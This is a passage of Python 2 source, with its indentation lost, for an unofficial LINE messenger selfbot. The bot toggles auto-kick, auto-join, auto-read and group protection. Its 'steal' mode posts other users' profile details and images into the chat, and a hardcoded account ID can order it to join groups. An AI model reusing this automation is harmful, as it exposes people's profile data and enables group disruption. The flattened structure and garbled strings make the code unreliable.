cl.sendText(msg.to,"ɴᴏᴛ ᴛᴏ ᴄᴏᴍᴍᴇɴᴛ")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"ᴅᴇʟᴇᴛᴇ ʙʟᴀᴄᴋʟɪsᴛ ᴄᴏᴍᴘʟᴇᴛᴇ")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"ᴅᴇʟᴇᴛᴇ ʙʟᴀᴄᴋʟɪsᴛ ᴄᴏᴍᴘʟᴇᴛᴇ")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"ᴄᴏᴍᴘʟᴇᴛᴇ ᴀʟʀᴇᴀᴅʏ")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"ᴄᴏᴍᴘʟᴇᴛᴇ ᴀʟʀᴇᴀᴅʏ")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"ᴅᴇʟᴇᴛᴇ ʙʟᴀᴄᴋʟɪsᴛ ᴄᴏᴍᴘʟᴇᴛᴇ")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"ɴᴏ ʙʟᴀᴄᴋʟɪsᴛ ᴜsᴇʀ")
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["kickMention"] == True:
contact = cl.getContact(msg.from_)
cName = contact.displayName
balas = ["จุกไมละมึง By. ༺ πနးຫຮี่のีধ์͜͡ ༻" + cName]
ret_ = random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in admin:
cl.sendText(msg.to,ret_)
random.choice(KAC).kickoutFromGroup(msg.to,[msg.from_])
break
if mention['M'] in Bots:
cl.sendText(msg.to,ret_)
random.choice(KAC).kickoutFromGroup(msg.to,[msg.from_])
break
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["detectMention"] == True:
contact = cl.getContact(msg.from_)
cName = contact.displayName
balas = [cName + "\n" + str(wait["tag1"]) , cName + "\n" + str(wait["tag2"])]
ret_ = random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
cl.sendText(msg.to,ret_)
break
if msg.contentType == 13:
if wait["steal"] == True:
_name = msg.contentMetadata["displayName"]
copy = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
print "[Target] Stealed"
break
else:
targets.append(copy)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + msg.contentMetadata["mid"] + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithUrl(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithUrl(msg.to,path)
wait["steal"] = False
break
except:
pass
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ == "u7a4febc4c650fc7679eadf4245c2a5ad":
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
G = cl.getGroup(list_[1])
G.preventJoinByTicket = True
cl.updateGroup(G)
except:
cl.sendText(msg.to,"error")
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
cl.like(url[25:58], url[66:], likeType=1001)
if wait["alwayRead"] == True:
if msg.toType == 0:
cl.sendChatChecked(msg.from_,msg.id)
else:
cl.sendChatChecked(msg.to,msg.id)
# Op program in bot Comment By Googlez #
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"ᴄᴏᴍᴘʟᴇᴛᴇ ᴀʟʀᴇᴀᴅʏ")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"ɴᴏᴛ ᴛᴏ ᴄᴏᴍᴍᴇɴᴛ")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"ᴅᴇʟᴇᴛᴇ ʙʟᴀᴄᴋʟɪsᴛ ᴄᴏᴍᴘʟᴇᴛᴇ")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"ᴅᴇʟᴇᴛᴇ ʙʟᴀᴄᴋʟɪsᴛ ᴄᴏᴍᴘʟᴇᴛᴇ")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"ᴄᴏᴍᴘʟᴇᴛᴇ ᴀʟʀᴇᴀᴅʏ")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"ᴄᴏᴍᴘʟᴇᴛᴇ ᴀʟʀᴇᴀᴅʏ")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"ᴅᴇʟᴇᴛᴇ ʙʟᴀᴄᴋʟɪsᴛ ᴄᴏᴍᴘʟᴇᴛᴇ")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"ɴᴏ ʙʟᴀᴄᴋʟɪsᴛ ᴜsᴇʀ")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif "TL:" in msg.text:
tl_text = msg.text.replace("TL:","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif msg.text in ["Help","คำสั่ง"]:
cl.sendText(msg.to, helpMessage + "")
elif msg.text in ["Help2"]:
cl.sendText(msg.to, helpMessage2 + "")
#======================================================#
elif msg.text in ["อ่านเปิด","Read:on"]:
wait['alwayRead'] = True
cl.sendText(msg.to,"Auto Sider ON")
elif msg.text in ["อ่านปิด","Read:off"]:
wait['alwayRead'] = False
cl.sendText(msg.to,"Auto Sider OFF")
#======================================================#
elif msg.text in ["แท็กเปิด","Autorespon:on","Respon on","Respon:on"]:
wait["detectMention"] = True
cl.sendText(msg.to,"Auto Respon ON")
elif msg.text in ["แท็กปิด","Autorespon:off","Respon off","Respon:off"]:
wait["detectMention"] = False
cl.sendText(msg.to,"Auto Respon OFF")
#======================================================#
elif msg.text in ["เตะแท็กเปิด","Autokick:on","Responkick on","Responkick:on"]:
wait["kickMention"] = True
cl.sendText(msg.to,"Auto Kick ON")
elif msg.text in ["เตะแท็กปิด","Autokick:off","Responkick off","Responkick:off"]:
wait["kickMention"] = False
cl.sendText(msg.to,"Auto Kick OFF")
#======================================================#
elif msg.text in ["ทักเข้า","Hhx1"]:
cl.sendText(msg.to,"[เช็คข้อความต้อนรับของคุณ]\n\n" + str(wait["acomment"]))
elif msg.text in ["ทักออก","Hhx2"]:
cl.sendText(msg.to,"[เช็คข้อความกล่าวถึงคนออกจากกลุ่ม]\n\n" + str(wait["bcomment"]))
elif msg.text in ["ทักลบ","Hhx3"]:
cl.sendText(msg.to,"[เช็คข้อความกล่าวถึงคนลบสมาชิก]\n\n" + str(wait["ccomment"]))
#======================================================#
elif "ทักเข้า: " in msg.text:
c = msg.text.replace("ทักเข้า: ","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"เกิดข้อผิดพลาด..!!")
else:
wait["acomment"] = c
cl.sendText(msg.to,"➠ ตั้งค่าข้อความต้อนรับ👌\n\n" + c)
elif "ทักออก: " in msg.text:
c = msg.text.replace("ทักออก: ","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"เกิดข้อผิดพลาด..!!")
else:
wait["bcomment"] = c
cl.sendText(msg.to,"➠ ตั้งค่าข้อความกล่าวถึงคนออกจากกลุ่ม👌\n\n" + c)
elif "ทักลบ: " in msg.text:
c = msg.text.replace("ทักลบ: ","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"เกิดข้อผิดพลาด..!!")
else:
wait["ccomment"] = c
cl.sendText(msg.to,"➠ ตั้งค่าข้อความกล่าวถึงคนลบสมาชิก👌\n\n" + c)
#======================================================#
elif msg.text in ["ต้อนรับเปิด"]:
if wait["acommentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ เปิดข้อความต้อนรับเเล้ว👌")
else:
cl.sendText(msg.to,"Already on")
else:
wait["acommentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ เปิดข้อความต้อนรับเเล้ว👌")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["ต้อนรับปิด"]:
if wait["acommentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความต้อนรับเเล้ว👌")
else:
cl.sendText(msg.to,"Already off")
else:
wait["acommentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความต้อนรับเเล้ว👌")
else:
cl.sendText(msg.to,"Already off")
#======================================================#
elif msg.text in ["ทักออกเปิด"]:
if wait["bcommentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ เปิดข้อความกล่าวถึงคนออกจากกลุ่ม👌")
else:
cl.sendText(msg.to,"Already on")
else:
wait["bcommentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ เปิดข้อความกล่าวถึงคนออกจากกลุ่ม👌")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["ทักออกปิด"]:
if wait["bcommentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความกล่าวถึงคนออกจากกลุ่ม👌")
else:
cl.sendText(msg.to,"Already off")
else:
wait["bcommentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความกล่าวถึงคนออกจากกลุ่ม👌")
else:
cl.sendText(msg.to,"Already off")
#======================================================#
elif msg.text in ["ทักลบเปิด"]:
if wait["ccommentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ เปิดข้อความกล่าวถึงคนลบสมาชิก👌")
else:
cl.sendText(msg.to,"Already on")
else:
wait["ccommentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ เปิดข้อความกล่าวถึงคนลบสมาชิก👌")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["ทักลบปิด"]:
if wait["ccommentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความกล่าวถึงคนลบสมาชิก👌")
else:
cl.sendText(msg.to,"Already off")
else:
wait["ccommentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความกล่าวถึงคนลบสมาชิก👌")
else:
cl.sendText(msg.to,"Already off")
#======================================================#
elif msg.text.lower() == 'เช็คคทเปิด':
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"เปิดระบบเช็ค คท \n By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to," ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to," ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"เปิดระบบคอมเช็ค คท\n By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif msg.text.lower() == 'เช็คคทปิด':
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปิดระบบเช็ค คท")
else:
cl.sendText(msg.to,"By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปิดระบบเช็คคทอยู่ \n By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to," ༺ πနးຫຮี่のีধ์͜͡ ༻")
#======================================================#
elif msg.text in ['ป้องกันเปิด']:
if wait["protect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"เปิดระบบกัน By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"เปิดระบบกัน\n By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
wait["protect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"เปิดระบบกัน\n By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"เปิดระบบป้องกันอยุ่")
elif msg.text in ["ป้องกันปิด"]:
if wait["protect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปิดระบบป้องกัน \nBy. ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"ปิดระบบป้องกัน \n By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
wait["protect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to," ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to," ༺ πနးຫຮี่のีধ์͜͡ ༻")
#======================================================#
elif msg.text in ['กันลิ้งค์เปิด']:
if wait["linkprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Link Protection Enable 👈")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka ô€¨👈")
else:
wait["linkprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Link Protect Enable��")
else:
cl.sendText(msg.to,"It is already On ô€¨")
elif msg.text in ["กันลิ้งค์ปิด","qrprotect off"]:
if wait["linkprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Link Protection Disable ô€œ👈")
else:
cl.sendText(msg.to,"sudah dimatikan ô€œô€„‰👈")
else:
wait["linkprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already close")
else:
cl.sendText(msg.to,"It is already open ô€œ👈")
#======================================================#
elif msg.text in ['กันเชิญเปิด']:
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invite Protect Enable 👈")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka ô€¨👈")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invite Protect Enable")
else:
cl.sendText(msg.to,"It is already On ô€¨")
elif msg.text in ["กันเชิญปิด"]:
if wait["inviteprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invite Protection Disable ô€œ👈")
else:
cl.sendText(msg.to,"sudah dimatikan ô€œô€„‰👈")
else:
wait["inviteprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already close")
else:
cl.sendText(msg.to,"It is already open ô€œ👈")
#======================================================#
elif msg.text in ['กันยกเลิกเปิด']:
if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Protection Enable 👈")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka ô€¨👈")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already ON")
else:
cl.sendText(msg.to,"It is already On ô€¨")
elif msg.text in ["กันยกเลิกปิด"]:
if wait["cancelprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Protection Disable ô€œ👈")
else:
cl.sendText(msg.to,"sudah dimatikan ô€œô€„‰👈")
else:
wait["cancelprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already close")
else:
cl.sendText(msg.to,"It is already open ô€œ👈")
#======================================================#
elif msg.text.lower() == 'เข้าออโต้เปิด':
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah off 👈")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka ô€¨👈")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already ON")
else:
cl.sendText(msg.to,"It is already On ô€¨")
elif msg.text.lower() == 'เข้าออโต้ปิด':
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto Join Already Off")
else:
cl.sendText(msg.to,"Auto Join set off")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already close")
else:
cl.sendText(msg.to,"It is already open ô€œ👈")
#======================================================#
elif msg.text in ["ออกแชทรวมเปิด","Auto leave: on"]:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"on👈")
else:
cl.sendText(msg.to,"Sudah terbuka ")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done👈")
else:
cl.sendText(msg.to,"Is already open👈")
elif msg.text in ["ออกแชทรวมปิด","Auto leave: off"]:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"on👈")
else:
cl.sendText(msg.to,"Sudah off👈")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done👈")
else:
cl.sendText(msg.to,"Is already close👈")
#======================================================#
elif msg.text in ["แชร์เปิด","share on"]:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done ")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka👈")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"on👈")
else:
cl.sendText(msg.to,"on👈")
elif msg.text in ["แชร์ปิด","share off"]:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done👈")
else:
cl.sendText(msg.to,"It is already turned off 👈")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Off👈")
else:
cl.sendText(msg.to,"Off👈")
#======================================================#
elif msg.text in ["แอดเปิด","Add auto on"]:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already On")
else:
cl.sendText(msg.to,"Already On👈")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already On👈")
else:
cl.sendText(msg.to,"Already On👈")
elif msg.text in ["แอดปิด","Add auto off"]:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Hal ini sudah off👈")
else:
cl.sendText(msg.to,"Hal ini sudah dimatikan👈")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already Off👈")
else:
cl.sendText(msg.to,"Untuk mengaktifkan-off👈")
#======================================================#
elif msg.text in ["คอมเม้นเปิด","Com:on","Comment on"]:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"เปิดระบบคอมเม้น \n By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"เปิดระบบคอมเม้น\nBy. ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to," ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif msg.text in ["คอมเม้นปิด"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปิดระบบคอมเม้น \n By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Off👈")
else:
cl.sendText(msg.to,"By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
#======================================================#
elif msg.text in ["Notifed on","เปิดแจ้งเตือน","M on"]:
if msg.from_ in admin:
if wait["Notifed"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"เปิดเเจ้งเเตือนของคุณเเล้ว\n ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"เปิดเเจ้งเเตือนของคุณเเล้ว")
else:
wait["Notifed"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"เปิดเเจ้งเเตือนของคุณเเล้ว \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"เปิดเเจ้งเเตือนของคุณเเล้ว")
elif msg.text in ["Notifed off","ปิดแจ้งเตือน","M off"]:
if msg.from_ in admin:
if wait["Notifed"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปิดเเจ้งเเตือนของคุณเเล้ว \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"ปิดเเจ้งเเตือนของคุณเเล้ว \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
wait["Notifed"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปิดเเจ้งเเตือนของคุณเเล้ว \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"ปิดเเจ้งเเตือนของคุณเเล้ว \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
#======================================================#
elif msg.text in ["Notifedbot on","เปิดเเจ้งเตือนบอท","Mbot on"]:
if msg.from_ in admin:
if wait["Notifedbot"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"เปิดเเจ้งเเตือนบอทเเล้ว\n ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"เปิดเเจ้งเเตือนบอทเเล้ว\n ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
wait["Notifedbot"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"เปิดเเจ้งเเตือนบอทเเล้ว\n ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"เปิดเเจ้งเเตือนบอทเเล้ว \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif msg.text in ["Notifedbot off","ปิดแจ้งเตือนบอท","Mbot off"]:
if msg.from_ in admin:
if wait["Notifedbot"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปิดเเจ้งเเตือนบอทเเล้ว\n ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"ปิดเเจ้งเเตือนบอทเเล้ว\n ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
wait["Notifedbot"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปิดเเจ้งเเตือนบอทเเล้ว\n ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"ปิดเเจ้งเเตือนบอทเเล้ว\n ༺ πနးຫຮี่のีধ์͜͡ ༻")
#======================================================#
elif msg.text in ["กันยกเลิก1เปิด","cancel on"]:
if msg.from_ in admin:
if wait["Protectcancl"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["กันยกเลิก1ปิด","cancel off"]:
if msg.from_ in admin:
if wait["Protectcancl"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
#======================================================#
elif msg.text in ["เปิดลิ้งค์"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.preventJoinByTicket = False
cl.updateGroup(group)
if wait["lang"] == "JP":
cl.sendText(msg.to,"URL open ô€¨ô€„Œ")
else:
cl.sendText(msg.to,"URL open ô€¨ô€„Œ")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"It can not be used outside the group ô€œô€„‰👈")
else:
cl.sendText(msg.to,"Can not be used for groups other than ô€œô€„‰")
elif msg.text in ["ปิดลิ้งค์"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.preventJoinByTicket = True
cl.updateGroup(group)
if wait["lang"] == "JP":
cl.sendText(msg.to,"URL close ô€¨👈")
else:
cl.sendText(msg.to,"URL close ��€¨👈")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"It can not be used outside the group 👈")
else:
cl.sendText(msg.to,"Can not be used for groups other than ô€œ")
#======================================================#
elif msg.text in ["เปิดหมด"]:
cl.sendText(msg.to,"อ่านเปิด")
cl.sendText(msg.to,"แท็กเปิด")
cl.sendText(msg.to,"เตะแท็กเปิด")
cl.sendText(msg.to,"ต้อนรับเปิด")
cl.sendText(msg.to,"ทักออกเปิด")
cl.sendText(msg.to,"ทักลบเปิด")
cl.sendText(msg.to,"เช็คคทเปิด")
cl.sendText(msg.to,"ป้องกันเปิด")
cl.sendText(msg.to,"กันลิ้งค์เปิด")
cl.sendText(msg.to,"กันเชิญเปิด")
cl.sendText(msg.to,"กันยกเลิกเปิด")
cl.sendText(msg.to,"เข้าออโต้เปิด")
cl.sendText(msg.to,"ออกแชทรวมเปิด")
cl.sendText(msg.to,"แอดเปิด")
cl.sendText(msg.to,"คอมเม้นเปิด")
cl.sendText(msg.to,"เปิดแจ้งเตือน")
cl.sendText(msg.to,"เปิดแจ้งเตือนบอท")
cl.sendText(msg.to,"กันยกเลิก1เปิด")
cl.sendText(msg.to,"แชร์เปิด")
cl.sendText(msg.to,"༺ πနးຫຮี่のีধ์͜͡ ༻")
#======================================================#
elif msg.text in ["ปิดหมด"]:
cl.sendText(msg.to,"อ่านปิด")
cl.sendText(msg.to,"แท็กปิด")
cl.sendText(msg.to,"เตะแท็กปิด")
cl.sendText(msg.to,"ต้อนรับปิด")
cl.sendText(msg.to,"ทักออกปิด")
cl.sendText(msg.to,"ทักลบปิด")
cl.sendText(msg.to,"เช็คคทปิด")
cl.sendText(msg.to,"ป้องกันปิด")
cl.sendText(msg.to,"กันลิ้งค์ปิด")
cl.sendText(msg.to,"กันเชิญปิด")
cl.sendText(msg.to,"กันยกเลิกปิด")
cl.sendText(msg.to,"เข้าออโต้ปิด")
cl.sendText(msg.to,"ออกแชทรวมปิด")
cl.sendText(msg.to,"แอดปิด")
cl.sendText(msg.to,"คอมเม้นปิด")
cl.sendText(msg.to,"ปิดแจ้งเตือน")
cl.sendText(msg.to,"ปิดแจ้งเตือนบอท")
cl.sendText(msg.to,"กันยกเลิก1ปิด")
cl.sendText(msg.to,"แชร์ปิด")
cl.sendText(msg.to,"༺ πနးຫຮี่のีধ์͜͡ ༻")
#======================================================#
elif msg.text in ["Set1"]:
md = " ༺ πနးຫຮี่のีধ์͜͡ ༻\n"
if wait["contact"] == True: md+=" Contact:on \n"
else: md+=" Contact:off\n"
if wait["autoJoin"] == True: md+=" Auto Join:on \n"
else: md +=" Auto Join:off\n"
if wait["autoCancel"]["on"] == True:md+=" Auto cancel:" + str(wait["autoCancel"]["members"]) + "\n"
else: md+= " Group cancel:off \n"
if wait["leaveRoom"] == True: md+=" Auto leave:on \n"
else: md+=" Auto leave:off \n"
if wait["timeline"] == True: md+=" Share:on \n"
else:md+=" Share:off \n"
if wait["autoAdd"] == True: md+=" Auto add:on \n"
else:md+=" Auto add:off ��\n"
if wait["commentOn"] == True: md+=" Auto komentar:on \n"
else:md+=" Auto komentar:off \n"
if wait["protect"] == True: md+=" Protect:on 🔓\n"
else:md+=" Protect:off 🔒\n"
if wait["linkprotect"] == True: md+="Link Protect:on 🔓\n"
else:md+=" Link Protect:off🔒\n"
if wait["inviteprotect"] == True: md+="Invitation Protect:on🔓\n"
else:md+=" Invitation Protect:off🔒\n"
if wait["cancelprotect"] == True: md+" CancelProtect:on 🔓\n"
else:md+=" Cancel Protect:off 🔒\n"
cl.sendText(msg.to,"""
༺ πနးຫຮี่のีধ์͜͡ ༻
""" + md)
#======================================================#
elif msg.text in ["Set2"]:
md = " ༺ πနးຫຮี่のีধ์͜͡ ༻\n\n"
if wait["likeOn"] == True: md+=" Auto like : on \n"
else:md+=" Auto like : off \n"
